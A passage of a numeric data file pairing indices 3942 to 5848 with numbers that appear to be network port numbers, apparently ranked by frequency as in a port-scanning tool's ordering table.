3942 | 920 3943 | 915 3944 | 908 3945 | 907 3946 | 892 3947 | 890 3948 | 885 3949 | 884 3950 | 882 3951 | 877 3952 | 876 3953 | 865 3954 | 857 3955 | 852 3956 | 849 3957 | 842 3958 | 838 3959 | 827 3960 | 818 3961 | 793 3962 | 785 3963 | 784 3964 | 755 3965 | 746 3966 | 738 3967 | 737 3968 | 717 3969 | 34 3970 | 336 3971 | 325 3972 | 303 3973 | 276 3974 | 273 3975 | 236 3976 | 235 3977 | 233 3978 | 181 3979 | 604 3980 | 1362 3981 | 712 3982 | 1437 3983 | 2027 3984 | 1368 3985 | 1531 3986 | 645 3987 | 65301 3988 | 260 3989 | 536 3990 | 764 3991 | 698 3992 | 607 3993 | 1667 3994 | 1662 3995 | 1661 3996 | 404 3997 | 224 3998 | 418 3999 | 176 4000 | 848 4001 | 315 4002 | 466 4003 | 403 4004 | 1456 4005 | 1479 4006 | 355 4007 | 763 4008 | 1472 4009 | 453 4010 | 759 4011 | 437 4012 | 2432 4013 | 120 4014 | 415 4015 | 1544 4016 | 1511 4017 | 1538 4018 | 346 4019 | 173 4020 | 54 4021 | 56 4022 | 265 4023 | 1462 4024 | 13701 4025 | 1518 4026 | 1457 4027 | 117 4028 | 1470 4029 | 13715 4030 | 13714 4031 | 267 4032 | 1419 4033 | 1418 4034 | 1407 4035 | 380 4036 | 518 4037 | 65 4038 | 391 4039 | 392 4040 | 413 4041 | 1391 4042 | 614 4043 | 1408 4044 | 162 4045 | 108 4046 | 4987 4047 | 1502 4048 | 598 4049 | 582 4050 | 487 4051 | 530 4052 | 1509 4053 | 72 4054 | 4672 4055 | 189 4056 | 209 4057 | 270 4058 | 7464 4059 | 408 4060 | 191 4061 | 1459 4062 | 5714 4063 | 5717 4064 | 5713 4065 | 564 4066 | 767 4067 | 583 4068 | 1395 4069 | 192 4070 | 1448 4071 | 428 4072 | 4133 4073 | 1416 4074 | 773 4075 | 1458 4076 | 526 4077 | 1363 4078 | 742 4079 | 1464 4080 | 1427 4081 | 1482 4082 | 569 4083 | 571 4084 | 6141 4085 | 351 4086 | 3984 4087 | 5490 4088 | 2 4089 | 13718 4090 | 373 4091 | 17300 4092 | 910 4093 | 148 4094 | 7326 4095 | 271 4096 | 423 4097 | 1451 4098 | 480 4099 | 1430 4100 | 1429 4101 | 781 4102 | 383 4103 | 2564 4104 | 613 4105 | 612 4106 | 652 4107 | 5303 4108 | 1383 4109 | 128 4110 | 19150 4111 | 1453 4112 | 190 4113 | 1505 4114 | 1371 4115 | 533 4116 | 27009 4117 | 27007 4118 | 27005 4119 | 27003 4120 | 27002 4121 | 744 4122 | 1423 4123 | 1374 4124 | 141 4125 | 1440 4126 | 1396 4127 | 352 4128 | 96 4129 | 48 4130 | 552 4131 | 570 4132 | 217 4133 | 528 4134 | 452 4135 | 451 4136 | 2766 4137 | 2108 4138 | 132 4139 | 1993 4140 | 1987 4141 | 130 4142 | 18187 4143 | 216 4144 | 3421 4145 | 142 4146 | 13721 4147 | 67 4148 | 15151 4149 | 364 4150 | 1411 4151 | 205 4152 | 6548 4153 | 124 4154 | 116 4155 | 5193 4156 | 258 4157 | 485 4158 | 599 4159 | 149 4160 | 1469 4161 | 775 4162 | 2019 4163 | 516 4164 | 986 4165 | 977 4166 | 976 4167 | 955 4168 | 954 4169 | 937 4170 | 932 4171 | 8 4172 | 896 4173 | 893 4174 | 845 4175 | 768 4176 | 766 4177 | 739 4178 | 337 4179 | 329 4180 | 326 4181 | 305 4182 | 295 4183 | 294 4184 | 293 4185 | 289 4186 | 288 4187 | 277 4188 | 238 4189 | 234 4190 | 229 4191 | 228 4192 | 226 4193 | 522 4194 | 2028 4195 | 150 4196 | 572 4197 | 596 4198 | 420 4199 | 460 4200 | 1543 4201 | 358 4202 | 361 4203 | 470 4204 | 360 4205 | 457 4206 | 643 4207 | 322 4208 | 168 4209 | 753 4210 | 369 4211 | 185 4212 | 43188 4213 | 1541 4214 | 1540 4215 | 752 4216 | 496 4217 | 662 4218 | 1449 4219 | 1480 4220 | 1473 4221 | 184 4222 | 1672 4223 | 1671 4224 | 1670 4225 | 435 4226 | 434 4227 | 1532 4228 | 1360 4229 | 174 4230 | 472 4231 | 1361 4232 | 17007 4233 | 414 4234 | 535 4235 | 432 4236 | 479 4237 | 473 4238 | 151 4239 | 1542 4240 | 438 4241 | 1488 4242 | 1508 4243 | 618 4244 | 316 4245 | 1367 4246 | 439 4247 | 284 4248 | 542 4249 | 370 4250 | 2016 4251 | 248 4252 | 1491 4253 | 44123 4254 | 41230 4255 | 7173 4256 | 5670 4257 | 18136 4258 | 3925 4259 | 7088 4260 | 1425 4261 | 17755 4262 | 17756 4263 | 4072 4264 | 5841 4265 | 2102 4266 | 4123 4267 | 2989 4268 | 10051 4269 | 10050 4270 | 31029 4271 | 3726 4272 | 9978 4273 | 9925 4274 | 6061 4275 | 6058 4276 | 6057 4277 | 6056 4278 | 6054 4279 | 6053 4280 | 6049 4281 | 6048 4282 | 6047 4283 | 6046 4284 | 6045 4285 | 6044 4286 | 6043 4287 | 6042 4288 | 6041 4289 | 6040 4290 | 6039 4291 | 6038 4292 | 6037 4293 | 6036 4294 | 6035 4295 | 6034 4296 | 6033 4297 | 6032 4298 | 6031 4299 | 6029 4300 | 6028 4301 | 6027 4302 | 6026 4303 | 6024 4304 | 6023 4305 | 6022 4306 | 6020 4307 | 6019 4308 | 6018 4309 | 6016 4310 | 6014 4311 | 6013 4312 | 6012 4313 | 6011 4314 | 36462 4315 | 5793 4316 | 3423 4317 | 3424 4318 | 4095 4319 | 3646 4320 | 3510 4321 | 3722 4322 | 3651 4323 | 14500 4324 | 3865 4325 | 15345 4326 | 3763 4327 | 38422 4328 | 3877 4329 | 9092 4330 | 5344 4331 | 2341 4332 | 6116 4333 | 2157 4334 | 165 4335 | 6936 4336 | 8041 4337 | 3074 4338 | 2165 4339 | 4389 4340 | 5770 4341 | 5769 4342 | 16619 4343 | 11876 4344 | 11877 4345 | 3741 4346 | 3633 4347 | 3840 4348 | 3716 4349 | 3590 4350 | 2805 4351 | 4537 4352 | 9762 4353 | 5007 4354 | 5006 4355 | 5358 4356 | 4879 4357 | 6114 4358 | 4185 4359 | 2784 4360 | 3724 4361 | 2596 4362 | 2595 4363 | 4417 4364 | 4845 4365 | 22321 4366 | 22289 4367 | 3219 4368 | 1338 4369 | 36411 4370 | 3861 4371 | 5166 4372 | 3674 4373 | 1785 4374 | 534 4375 | 6602 4376 | 47001 4377 | 5363 4378 | 8912 4379 | 2231 4380 | 5747 4381 | 5748 4382 | 11208 4383 | 7236 4384 | 4049 4385 | 4050 4386 | 22347 4387 | 63 4388 | 3233 4389 | 3359 4390 | 4177 4391 | 48050 4392 | 3111 4393 | 3427 4394 | 5321 4395 | 5320 4396 | 3702 4397 | 2907 4398 | 8991 4399 | 8990 4400 | 2054 4401 | 4847 4402 | 9802 4403 | 9800 4404 | 4368 4405 | 5990 4406 | 3563 4407 | 5744 4408 | 5743 4409 | 12321 4410 | 12322 4411 | 9206 4412 | 9204 4413 | 9205 4414 | 9201 4415 | 9203 4416 | 2949 4417 | 2948 4418 | 6626 4419 | 8199 4420 | 4145 4421 | 3482 4422 | 2216 4423 | 13708 4424 | 3786 4425 | 3375 4426 | 7566 4427 | 2539 4428 | 2387 4429 | 3317 4430 | 2410 4431 | 2255 4432 | 3883 4433 | 4299 4434 | 4296 4435 | 4295 4436 | 4293 4437 | 4292 4438 | 4291 4439 | 4290 4440 | 4289 4441 | 4288 4442 | 4287 4443 | 4286 4444 | 4285 4445 | 4284 4446 | 4283 4447 | 4282 4448 | 4281 4449 | 4280 4450 | 4278 4451 | 4277 4452 | 4276 4453 | 4275 4454 | 4274 4455 | 4273 4456 | 4272 4457 | 4271 4458 | 4270 4459 | 4269 4460 | 4268 4461 | 4267 4462 | 4266 4463 | 4265 4464 | 4264 4465 | 4263 4466 | 4261 4467 | 4260 4468 | 4259 4469 | 4258 4470 | 4257 4471 | 4256 4472 | 4255 4473 | 4254 4474 | 4253 4475 | 4251 4476 | 4250 4477 | 4249 4478 | 4248 4479 | 4247 4480 | 4246 4481 | 4245 4482 | 4244 4483 | 4241 4484 | 4240 4485 | 4239 4486 | 4238 4487 | 4237 4488 | 4236 4489 | 4235 4490 | 4233 4491 | 4232 4492 | 4231 4493 | 4230 4494 | 4229 4495 | 4228 4496 | 4227 4497 | 4226 4498 | 4225 4499 | 4223 4500 | 4222 4501 | 4221 4502 | 4219 4503 | 4218 4504 | 4217 4505 | 4216 4506 | 4215 4507 | 4214 4508 | 4213 4509 | 4212 4510 | 4211 4511 | 4210 4512 | 4209 4513 | 4208 4514 | 4207 4515 | 4205 4516 | 4204 4517 | 4203 4518 | 4202 4519 | 4201 4520 | 2530 4521 | 5164 4522 | 28200 4523 | 3845 4524 | 3541 4525 | 4052 4526 | 21590 4527 | 1796 4528 | 25793 4529 | 8699 4530 | 8182 4531 | 4991 4532 | 2474 4533 | 5780 4534 | 3676 4535 | 24249 4536 | 1631 4537 | 6672 4538 | 6673 4539 | 3601 4540 | 3509 4541 | 1852 4542 | 2386 4543 | 8473 4544 | 7802 4545 | 4789 4546 | 3555 4547 | 12013 4548 | 12012 4549 | 3752 4550 | 3245 4551 | 3231 4552 | 16666 4553 | 6678 4554 | 17184 4555 | 9086 4556 | 9598 4557 | 3073 4558 | 2074 4559 | 1956 4560 | 2610 4561 | 3738 4562 | 2994 4563 | 2993 4564 | 1885 4565 | 14149 4566 | 13786 4567 | 10100 4568 | 9284 4569 | 14150 4570 | 10107 4571 | 4032 4572 | 2821 4573 | 3207 4574 | 14154 4575 | 2771 4576 | 5646 4577 | 2426 4578 | 18668 4579 | 2554 4580 | 4188 4581 | 3654 4582 | 8034 4583 | 5675 4584 | 15118 4585 | 4031 4586 | 2529 4587 | 2248 4588 | 1142 4589 | 19194 4590 | 433 4591 | 3534 4592 | 3664 4593 | 2537 4594 | 519 4595 | 2655 4596 | 4184 4597 | 1506 4598 | 3098 4599 | 7887 4600 | 37654 4601 | 1979 4602 | 9629 4603 | 2357 4604 | 1889 4605 | 3314 4606 | 3313 4607 | 4867 4608 | 2696 4609 | 3217 4610 | 6306 4611 | 1189 4612 | 5281 4613 | 8953 4614 | 1910 4615 | 13894 4616 | 372 4617 | 3720 4618 | 1382 4619 | 2542 4620 | 3584 4621 | 4034 4622 | 145 4623 | 27999 4624 | 3791 4625 | 21800 4626 | 2670 4627 | 3492 4628 | 24678 4629 | 34249 4630 | 39681 4631 | 1846 4632 | 5197 4633 | 5462 4634 | 5463 4635 | 2862 4636 | 2977 4637 | 2978 4638 | 3468 4639 | 2675 4640 | 3474 4641 | 4422 4642 | 12753 4643 | 13709 4644 | 2573 4645 | 3012 4646 | 4307 4647 | 4725 4648 | 3346 4649 | 3686 4650 | 4070 4651 | 9555 4652 | 4711 4653 | 4323 4654 | 4322 4655 | 10200 4656 | 7727 4657 | 3608 4658 | 3959 4659 | 2405 4660 | 3858 4661 | 3857 4662 | 24322 4663 | 6118 4664 | 4176 4665 | 6442 4666 | 8937 4667 | 17224 4668 | 17225 4669 | 33434 4670 | 1906 4671 | 22351 4672 | 2158 4673 | 5153 4674 | 3885 4675 | 24465 4676 | 3040 4677 | 20167 4678 | 8066 4679 | 474 4680 | 2739 4681 | 3308 4682 | 590 4683 | 3309 4684 | 7902 4685 | 7901 4686 | 7903 4687 | 20046 4688 | 5582 4689 | 5583 4690 | 7872 4691 | 13716 4692 | 13717 4693 | 13705 4694 | 6252 4695 | 2915 4696 | 1965 4697 | 3459 4698 | 3160 4699 | 3754 4700 | 3243 4701 | 10261 4702 | 7932 4703 | 7933 4704 | 5450 4705 | 379 4706 | 7548 4707 | 1832 4708 | 3805 4709 | 16789 4710 | 8320 4711 | 8321 4712 | 4423 4713 | 2296 4714 | 7359 4715 | 7358 4716 | 7357 4717 | 7356 4718 | 7355 4719 | 7354 4720 | 7353 4721 | 7352 4722 | 7351 4723 | 7350 4724 | 7349 4725 | 7348 4726 | 7347 4727 | 7346 4728 | 7344 4729 | 7343 4730 | 7342 4731 | 7341 4732 | 7340 4733 | 7339 4734 | 7338 4735 | 7337 4736 | 7336 4737 | 7335 4738 | 7334 4739 | 7333 4740 | 7332 4741 | 7331 4742 | 7330 4743 | 7329 4744 | 7328 4745 | 7327 4746 | 7324 4747 | 7323 4748 | 7322 4749 | 7321 4750 | 7319 4751 | 7318 4752 | 7317 4753 | 7316 4754 | 7315 4755 | 7314 4756 | 7313 4757 | 7312 4758 | 7311 4759 | 7310 4760 | 7309 4761 | 7308 4762 | 7307 4763 | 7306 4764 | 7305 4765 | 7304 4766 | 7303 4767 | 7302 4768 | 7301 4769 | 8140 4770 | 5196 4771 | 5195 4772 | 6130 4773 | 5474 4774 | 5471 4775 | 5472 4776 | 5470 4777 | 4146 4778 | 3713 4779 | 5048 4780 | 31457 4781 | 7631 4782 | 3544 4783 | 41121 4784 | 11600 4785 | 3696 4786 | 3549 4787 | 1380 4788 | 22951 4789 | 22800 4790 | 3521 4791 | 2060 4792 | 6083 4793 | 9668 4794 | 3552 4795 | 1814 4796 | 1977 4797 | 2576 4798 | 2729 4799 | 24680 4800 | 13710 4801 | 13712 4802 | 25900 4803 | 2403 4804 | 2402 4805 | 2470 4806 | 5203 4807 | 3579 4808 | 2306 4809 | 1450 4810 | 7015 4811 | 7012 4812 | 7011 4813 | 22763 4814 | 2156 4815 | 2493 4816 | 4019 4817 | 4018 4818 | 4017 4819 | 4015 4820 | 2392 4821 | 3175 4822 | 32249 4823 | 1627 4824 | 10104 4825 | 2609 4826 | 5406 4827 | 3251 4828 | 4094 4829 | 3241 4830 | 6514 4831 | 6418 4832 | 3734 4833 | 2679 4834 | 4953 4835 | 5008 4836 | 2880 4837 | 8243 4838 | 8280 4839 | 26133 4840 | 8555 4841 | 5629 4842 | 3547 4843 | 5639 4844 | 5638 4845 | 5637 4846 | 5115 4847 | 3723 4848 | 4950 4849 | 3895 4850 | 3894 4851 | 3491 4852 | 3318 4853 | 6419 4854 | 3185 4855 | 243 4856 | 3212 4857 | 9536 4858 | 1925 4859 | 11171 4860 | 8404 4861 | 8405 4862 | 8989 4863 | 6787 4864 | 6483 4865 | 3867 4866 | 3866 4867 | 1860 4868 | 1870 4869 | 5306 4870 | 3816 4871 | 7588 4872 | 6786 4873 | 2084 4874 | 11165 4875 | 11161 4876 | 11163 4877 | 11162 4878 | 11164 4879 | 3708 4880 | 4850 4881 | 7677 4882 | 16959 4883 | 247 4884 | 3478 4885 | 5349 4886 | 3854 4887 | 5397 4888 | 7411 4889 | 9612 4890 | 11173 4891 | 9293 4892 | 5027 4893 | 5026 4894 | 5705 4895 | 8778 4896 | 527 4897 | 1312 4898 | 8808 4899 | 6144 4900 | 4157 4901 | 4156 4902 | 3249 4903 | 7471 4904 | 3615 4905 | 2154 4906 | 45966 4907 | 17235 4908 | 3018 4909 | 38800 4910 | 2737 4911 | 156 4912 | 3807 4913 | 2876 4914 | 1759 4915 | 7981 4916 | 3606 4917 | 3647 4918 | 3438 4919 | 4683 4920 | 9306 4921 | 9312 4922 | 7016 4923 | 33334 4924 | 3413 4925 | 3834 4926 | 3835 4927 | 2440 4928 | 6121 4929 | 2568 4930 | 17185 4931 | 7982 4932 | 2290 4933 | 2569 4934 | 2863 4935 | 1964 4936 | 4738 4937 | 2132 4938 | 17777 4939 | 16162 4940 | 6551 4941 | 3230 4942 | 4538 4943 | 3884 4944 | 9282 4945 | 9281 4946 | 4882 4947 | 5146 4948 | 580 4949 | 1967 4950 | 2659 4951 | 2409 4952 | 5416 4953 | 2657 4954 | 3380 4955 | 5417 4956 | 2658 4957 | 5161 4958 | 5162 4959 | 10162 4960 | 10161 4961 | 33656 4962 | 7560 4963 | 2599 4964 | 2704 4965 | 2703 4966 | 4170 4967 | 7734 4968 | 9522 4969 | 3158 4970 | 4426 4971 | 4786 4972 | 2721 4973 | 1608 4974 | 3516 4975 | 4988 4976 | 4408 4977 | 1847 4978 | 36423 4979 | 2826 4980 | 2827 4981 | 3556 4982 | 6456 4983 | 6455 4984 | 3874 4985 | 3611 4986 | 2629 4987 | 2630 4988 | 166 4989 | 5059 4990 | 3110 4991 | 1733 4992 | 40404 4993 | 2257 4994 | 2278 4995 | 4750 4996 | 4303 4997 | 3688 4998 | 4751 4999 | 5794 5000 | 4752 5001 | 7626 5002 | 16950 5003 | 3273 5004 | 3896 5005 | 3635 5006 | 1959 5007 | 4753 5008 | 2857 5009 | 4163 5010 | 1659 5011 | 2905 5012 | 2904 5013 | 2733 5014 | 4936 5015 | 5032 5016 | 3048 5017 | 28240 5018 | 2320 5019 | 4742 5020 | 22335 5021 | 5043 5022 | 4105 5023 | 1257 5024 | 3841 5025 | 43210 5026 | 4366 5027 | 5163 5028 | 11106 5029 | 5434 5030 | 6444 5031 | 6445 5032 | 5634 5033 | 5636 5034 | 5635 5035 | 6343 5036 | 4546 5037 | 3242 5038 | 5568 5039 | 4057 5040 | 24666 5041 | 21221 5042 | 6488 5043 | 6484 5044 | 6486 5045 | 6485 5046 | 6487 5047 | 6443 5048 | 6480 5049 | 6489 5050 | 2603 5051 | 4787 5052 | 2367 5053 | 9212 5054 | 9213 5055 | 5445 5056 | 45824 5057 | 8351 5058 | 13711 5059 | 4076 5060 | 5099 5061 | 2316 5062 | 3588 5063 | 5093 5064 | 9450 5065 | 8056 5066 | 8055 5067 | 8054 5068 | 8059 5069 | 8058 5070 | 8057 5071 | 8053 5072 | 3090 5073 | 3255 5074 | 2254 5075 | 2479 5076 | 2477 5077 | 2478 5078 | 3496 5079 | 3495 5080 | 2089 5081 | 38865 5082 | 9026 5083 | 9025 5084 | 9024 5085 | 9023 5086 | 3480 5087 | 1905 5088 | 3550 5089 | 7801 5090 | 2189 5091 | 5361 5092 | 32635 5093 | 3782 5094 | 3432 5095 | 3978 5096 | 6629 5097 | 3143 5098 | 7784 5099 | 2342 5100 | 2309 5101 | 2705 5102 | 2310 5103 | 2384 5104 | 6315 5105 | 5343 5106 | 9899 5107 | 5168 5108 | 5167 5109 | 3927 5110 | 266 5111 | 2577 5112 | 5307 5113 | 3838 5114 | 19007 5115 | 7708 5116 | 37475 5117 | 7701 5118 | 5435 5119 | 3499 5120 | 2719 5121 | 3352 5122 | 25576 5123 | 3942 5124 | 1644 5125 | 3755 5126 | 5574 5127 | 5573 5128 | 7542 5129 | 1129 5130 | 4079 5131 | 3038 5132 | 4033 5133 | 9401 5134 | 9402 5135 | 20012 5136 | 20013 5137 | 30832 5138 | 1606 5139 | 5410 5140 | 5422 5141 | 5409 5142 | 9801 5143 | 7743 5144 | 14034 5145 | 14033 5146 | 4952 5147 | 3452 5148 | 2760 5149 | 3153 5150 | 23272 5151 | 2578 5152 | 5156 5153 | 8554 5154 | 7401 5155 | 3771 5156 | 3138 5157 | 3137 5158 | 3500 5159 | 6900 5160 | 363 5161 | 3455 5162 | 1698 5163 | 13217 5164 | 2752 5165 | 3864 5166 | 10201 5167 | 6568 5168 | 2377 5169 | 3677 5170 | 520 5171 | 2258 5172 | 4124 5173 | 8051 5174 | 2223 5175 | 3194 5176 | 4041 5177 | 48653 5178 | 8270 5179 | 5693 5180 | 25471 5181 | 2416 5182 | 9208 5183 | 7810 5184 | 7870 5185 | 2249 5186 | 7473 5187 | 4664 5188 | 4590 5189 | 2777 5190 | 2776 5191 | 2057 5192 | 6148 5193 | 3296 5194 | 4410 5195 | 4684 5196 | 8230 5197 | 5842 5198 | 1431 5199 | 12109 5200 | 4756 5201 | 4336 5202 | 324 5203 | 323 5204 | 3019 5205 | 39 5206 | 2225 5207 | 4733 5208 | 30100 5209 | 2999 5210 | 3422 5211 | 107 5212 | 1232 5213 | 3418 5214 | 3537 5215 | 5 5216 | 8184 5217 | 3789 5218 | 5231 5219 | 4731 5220 | 4373 5221 | 45045 5222 | 3974 5223 | 12302 5224 | 2373 5225 | 6084 5226 | 16665 5227 | 16385 5228 | 18635 5229 | 18634 5230 | 10253 5231 | 7227 5232 | 3572 5233 | 3032 5234 | 5786 5235 | 2346 5236 | 2348 5237 | 2347 5238 | 2349 5239 | 45002 5240 | 3553 5241 | 43191 5242 | 5313 5243 | 3707 5244 | 3706 5245 | 3736 5246 | 32811 5247 | 1942 5248 | 44553 5249 | 35001 5250 | 35002 5251 | 35005 5252 | 35006 5253 | 35003 5254 | 35004 5255 | 532 5256 | 2214 5257 | 5569 5258 | 3142 5259 | 2332 5260 | 3768 5261 | 2774 5262 | 2773 5263 | 6099 5264 | 2167 5265 | 2714 5266 | 2713 5267 | 3533 5268 | 4037 5269 | 2457 5270 | 1953 5271 | 9345 5272 | 21553 5273 | 2408 5274 | 2736 5275 | 2188 5276 | 18104 5277 | 1813 5278 | 469 5279 | 1596 5280 | 3178 5281 | 5430 5282 | 5676 5283 | 2177 5284 | 4841 5285 | 5028 5286 | 7980 5287 | 3166 5288 | 3554 5289 | 3566 5290 | 3843 5291 | 5677 5292 | 7040 5293 | 2589 5294 | 8153 5295 | 10055 5296 | 5464 5297 | 2497 5298 | 4354 5299 | 9222 5300 | 5083 5301 | 5082 5302 | 45825 5303 | 2612 5304 | 5689 5305 | 6209 5306 | 2523 5307 | 2490 5308 | 2468 5309 | 3543 5310 | 7794 5311 | 4193 5312 | 4951 5313 | 3951 5314 | 4093 5315 | 7747 5316 | 7997 5317 | 8117 5318 | 6140 5319 | 4329 5320 | 320 5321 | 319 5322 | 597 5323 | 3453 5324 | 4457 5325 | 2303 5326 | 5360 5327 | 4487 5328 | 409 5329 | 344 5330 | 1460 5331 | 5716 5332 | 5715 5333 | 9640 5334 | 7663 5335 | 7798 5336 | 7797 5337 | 4352 5338 | 15999 5339 | 34962 5340 | 34963 5341 | 34964 5342 | 4749 5343 | 8032 5344 | 4182 5345 | 1283 5346 | 1778 5347 | 3248 5348 | 2722 5349 | 2039 5350 | 3650 5351 | 3133 5352 | 2618 5353 | 4168 5354 | 10631 5355 | 1392 5356 | 3910 5357 | 6716 5358 | 47809 5359 | 4690 5360 | 9280 5361 | 6163 5362 | 2315 5363 | 3607 5364 | 5630 5365 | 4455 5366 | 4456 5367 | 1587 5368 | 28001 5369 | 5134 5370 | 13224 5371 | 13223 5372 | 5507 5373 | 2443 5374 | 4150 5375 | 7172 5376 | 3710 5377 | 9889 5378 | 6464 5379 | 7787 5380 | 6771 5381 | 6770 5382 | 3055 5383 | 2487 5384 | 16310 5385 | 16311 5386 | 3540 5387 | 34379 5388 | 34378 5389 | 2972 5390 | 7633 5391 | 6355 5392 | 188 5393 | 2790 5394 | 32400 5395 | 4351 5396 | 3934 5397 | 3933 5398 | 4659 5399 | 1819 5400 | 5586 5401 | 5863 5402 | 9318 5403 | 318 5404 | 5318 5405 | 2634 5406 | 4416 5407 | 5078 5408 | 3189 5409 | 3010 5410 | 15740 5411 | 1603 5412 | 2787 5413 | 4390 5414 | 468 5415 | 4869 5416 | 4868 5417 | 3177 5418 | 3347 5419 | 6124 5420 | 2350 5421 | 3208 5422 | 2520 5423 | 2441 5424 | 3109 5425 | 3557 5426 | 281 5427 | 1916 5428 | 4313 5429 | 5312 5430 | 4066 5431 | 345 5432 | 9630 5433 | 9631 5434 | 6817 5435 | 3582 5436 | 9279 5437 | 9278 5438 | 3587 5439 | 4747 5440 | 2178 5441 | 5112 5442 | 3135 5443 | 5443 5444 | 7880 5445 | 1980 5446 | 6086 5447 | 3254 5448 | 4012 5449 | 9597 5450 | 3253 5451 | 2274 5452 | 2299 5453 | 8444 5454 | 6655 5455 | 44322 5456 | 44321 5457 | 5351 5458 | 5350 5459 | 5172 5460 | 4172 5461 | 1332 5462 | 2256 5463 | 8129 5464 | 8128 5465 | 4097 5466 | 8161 5467 | 2665 5468 | 2664 5469 | 6162 5470 | 4189 5471 | 1333 5472 | 3735 5473 | 586 5474 | 6581 5475 | 6582 5476 | 4681 5477 | 4312 5478 | 4989 5479 | 7216 5480 | 3348 5481 | 7680 5482 | 8276 5483 | 3095 5484 | 6657 5485 | 30002 5486 | 7237 5487 | 3435 5488 | 2246 5489 | 1675 5490 | 31400 5491 | 4311 5492 | 6671 5493 | 6679 5494 | 3034 5495 | 40853 5496 | 11103 5497 | 3274 5498 | 3355 5499 | 3078 5500 | 3075 5501 | 3076 5502 | 8070 5503 | 2484 5504 | 2483 5505 | 3891 5506 | 1571 5507 | 1830 5508 | 1630 5509 | 8997 5510 | 8102 5511 | 2482 5512 | 2481 5513 | 5155 5514 | 5575 5515 | 3718 5516 | 22005 5517 | 22004 5518 | 22003 5519 | 22002 5520 | 2524 5521 | 1829 5522 | 2237 5523 | 3977 5524 | 3976 5525 | 3303 5526 | 19191 5527 | 3433 5528 | 5724 5529 | 2400 5530 | 7629 5531 | 6640 5532 | 2389 5533 | 30999 5534 | 2447 5535 | 3673 5536 | 7430 5537 | 7429 5538 | 7426 5539 | 7431 5540 | 7428 5541 | 7427 5542 | 9390 5543 | 35357 5544 | 7728 5545 | 8004 5546 | 5045 5547 | 8688 5548 | 1258 5549 | 5757 5550 | 5729 5551 | 5767 5552 | 5766 5553 | 5755 5554 | 5768 5555 | 4743 5556 | 9008 5557 | 9007 5558 | 3187 5559 | 20014 5560 | 4089 5561 | 3434 5562 | 4843 5563 | 3100 5564 | 314 5565 | 3154 5566 | 9994 5567 | 9993 5568 | 4304 5569 | 2428 5570 | 2199 5571 | 2198 5572 | 2185 5573 | 4428 5574 | 4429 5575 | 4162 5576 | 4395 5577 | 2056 5578 | 5402 5579 | 3340 5580 | 3339 5581 | 3341 5582 | 3338 5583 | 7275 5584 | 7274 5585 | 7277 5586 | 7276 5587 | 4359 5588 | 2077 5589 | 9966 5590 | 4732 5591 | 3320 5592 | 11175 5593 | 11174 5594 | 11172 5595 | 13706 5596 | 3523 5597 | 429 5598 | 2697 5599 | 18186 5600 | 3442 5601 | 3441 5602 | 29167 5603 | 36602 5604 | 7030 5605 | 1894 5606 | 28000 5607 | 126 5608 | 4420 5609 | 2184 5610 | 3780 5611 | 49001 5612 | 4128 5613 | 8711 5614 | 10810 5615 | 45001 5616 | 5415 5617 | 4453 5618 | 359 5619 | 3266 5620 | 36424 5621 | 2868 5622 | 7724 5623 | 396 5624 | 2645 5625 | 23402 5626 | 23400 5627 | 23401 5628 | 3016 5629 | 21010 5630 | 5215 5631 | 4663 5632 | 4803 5633 | 2338 5634 | 15126 5635 | 5209 5636 | 3406 5637 | 3405 5638 | 5627 5639 | 4088 5640 | 2210 5641 | 2244 5642 | 2817 5643 | 10111 5644 | 10110 5645 | 1242 5646 | 5299 5647 | 2252 5648 | 3649 5649 | 6421 5650 | 6420 5651 | 1617 5652 | 48001 5653 | 48002 5654 | 48003 5655 | 48005 5656 | 48004 5657 | 48000 5658 | 61 5659 | 4134 5660 | 38412 5661 | 20048 5662 | 7393 5663 | 4021 5664 | 178 5665 | 8457 5666 | 550 5667 | 2058 5668 | 2075 5669 | 2076 5670 | 3165 5671 | 6133 5672 | 2614 5673 | 2585 5674 | 4702 5675 | 4701 5676 | 2586 5677 | 3203 5678 | 3204 5679 | 16361 5680 | 16367 5681 | 16360 5682 | 16368 5683 | 4159 5684 | 170 5685 | 2293 5686 | 4703 5687 | 8981 5688 | 3409 5689 | 7549 5690 | 171 5691 | 20049 5692 | 1155 5693 | 537 5694 | 3196 5695 | 3195 5696 | 2411 5697 | 2788 5698 | 4127 5699 | 6777 5700 | 6778 5701 | 1879 5702 | 5421 5703 | 3440 5704 | 2128 5705 | 21846 5706 | 21849 5707 | 21847 5708 | 21848 5709 | 395 5710 | 154 5711 | 155 5712 | 4425 5713 | 2328 5714 | 3129 5715 | 3641 5716 | 3640 5717 | 1970 5718 | 2486 5719 | 2485 5720 | 6842 5721 | 6841 5722 | 3149 5723 | 3148 5724 | 3150 5725 | 3151 5726 | 1406 5727 | 218 5728 | 10116 5729 | 10114 5730 | 2219 5731 | 2735 5732 | 10117 5733 | 10113 5734 | 2220 5735 | 3725 5736 | 5229 5737 | 4350 5738 | 6513 5739 | 4335 5740 | 4334 5741 | 5681 5742 | 1676 5743 | 2971 5744 | 4409 5745 | 3131 5746 | 4441 5747 | 1612 5748 | 1616 5749 | 1613 5750 | 1614 5751 | 13785 5752 | 11104 5753 | 11105 5754 | 3829 5755 | 11095 5756 | 3507 5757 | 3213 5758 | 7474 5759 | 3886 5760 | 4043 5761 | 2730 5762 | 377 5763 | 378 5764 | 3024 5765 | 2738 5766 | 2528 5767 | 4844 5768 | 4842 5769 | 5979 5770 | 1888 5771 | 2093 5772 | 2094 5773 | 20034 5774 | 2163 5775 | 3159 5776 | 6317 5777 | 4361 5778 | 2895 5779 | 3753 5780 | 2343 5781 | 3015 5782 | 1790 5783 | 3950 5784 | 6363 5785 | 9286 5786 | 9285 5787 | 7282 5788 | 6446 5789 | 2273 5790 | 33060 5791 | 2388 5792 | 9119 5793 | 3733 5794 | 32801 5795 | 4421 5796 | 7420 5797 | 9903 5798 | 6622 5799 | 5354 5800 | 7742 5801 | 2305 5802 | 2791 5803 | 8115 5804 | 3122 5805 | 2855 5806 | 2871 5807 | 4554 5808 | 2171 5809 | 2172 5810 | 2173 5811 | 2174 5812 | 3343 5813 | 7392 5814 | 3958 5815 | 3358 5816 | 46 5817 | 6634 5818 | 8503 5819 | 3924 5820 | 2488 5821 | 10544 5822 | 10543 5823 | 10541 5824 | 10540 5825 | 10542 5826 | 4691 5827 | 8666 5828 | 1576 5829 | 4986 5830 | 6997 5831 | 3732 5832 | 4688 5833 | 7871 5834 | 9632 5835 | 7869 5836 | 2593 5837 | 3764 5838 | 5237 5839 | 4668 5840 | 4173 5841 | 4667 5842 | 8077 5843 | 4310 5844 | 7606 5845 | 5136 5846 | 4069 5847 | 21554 5848 | 7391 5849 | 